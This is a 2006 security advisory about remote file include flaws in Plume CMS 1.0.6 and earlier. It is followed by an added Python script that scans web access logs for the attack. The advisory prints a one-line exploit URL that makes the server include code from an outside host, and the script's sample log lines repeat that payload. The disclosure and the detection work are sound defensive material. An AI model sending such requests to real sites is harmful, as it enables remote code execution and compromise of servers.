plume-1.0.6.txt

2006-08-27T00:00:00
ID PACKETSTORM:49411
Type packetstorm
Reporter Vagner Rodrigues Fernandes
Modified 2006-08-27T00:00:00

Description

                                        
                                            `Plume CMS Multiple Remote File Include Vulnerabilities  
Vulnerable Versions: Plume CMS <= 1.0.6  
Vendor: Plume CMS http://plume-cms.net  
  
-Vulnerable Code  
include $_PX_config['manager_path'].'/directory/_file.php';  
  
-Files Affected  
./articles.php  
./categories.php  
./index.php  
./news.php  
./prefs.php  
./sites.php  
./subtypes.php  
./users.php  
./xmedia.php  
./frontinc/class.template.php  
./frontinc/prepend.php  
./inc/lib.text.php  
./install/index.php  
./install/upgrade.php  
./tools/htaccess/index.php  
  
-Exploit  
http://www.example.com/path/index.php?_PX_config[manager_path]=http://host/evilcode.txt?  
  
-Credits  
Vagner Rodrigues Fernandes (BugReport)  
vagner.rodrigues@gmail.com  
`
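
A detection check for the request pattern shown under -Exploit, as an added example that is not part of the original advisory: it scans web access-log lines for query parameters that try to set the _PX_config array, including the percent-encoded form of the brackets. The Apache-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Array name taken from the advisory's vulnerable include statement.
CONFIG_ARRAY = "_PX_config"
# Request line of an Apache-style access-log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts like a URL or PHP stream wrapper (scheme://...).
WRAPPER = re.compile(r"\s*[a-z][a-z0-9+.\-]*://", re.I)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Aug/2006:10:00:01 +0000] "GET /path/index.php?'
    '_PX_config[manager_path]=http://host/evilcode.txt? HTTP/1.1" 200 512',
    '192.0.2.10 - - [27/Aug/2006:10:00:05 +0000] "GET /path/news.php?'
    '_PX_config%5Bmanager_path%5D=http%3A%2F%2Fhost%2Fevilcode.txt%3F HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Aug/2006:10:02:40 +0000] "GET /path/prefs.php?'
    '_PX_config%5Bmanager_path%5D=/tmp HTTP/1.1" 200 90',
    '198.51.100.7 - - [27/Aug/2006:10:03:12 +0000] "GET /path/articles.php?'
    'id=12&ref=http://www.example.com/ HTTP/1.1" 200 2048',
]

def classify(log_line):
    """Return 'remote-include', 'config-override' or None for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B / %5D become [ / ].
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != CONFIG_ARRAY and not name.startswith(CONFIG_ARRAY + "["):
            continue  # URL-valued parameters with other names are not flagged
        if WRAPPER.match(value):
            return "remote-include"   # config key pointed at a remote resource
        verdict = "config-override"   # config key set from the request at all
    return verdict

def scan(lines):
    """Return (verdict, line) pairs for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((verdict, line))
    return hits

if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:16} {line}")
```

Parameters sent in a POST body or a cookie do not appear in access logs, so this check covers only the query string.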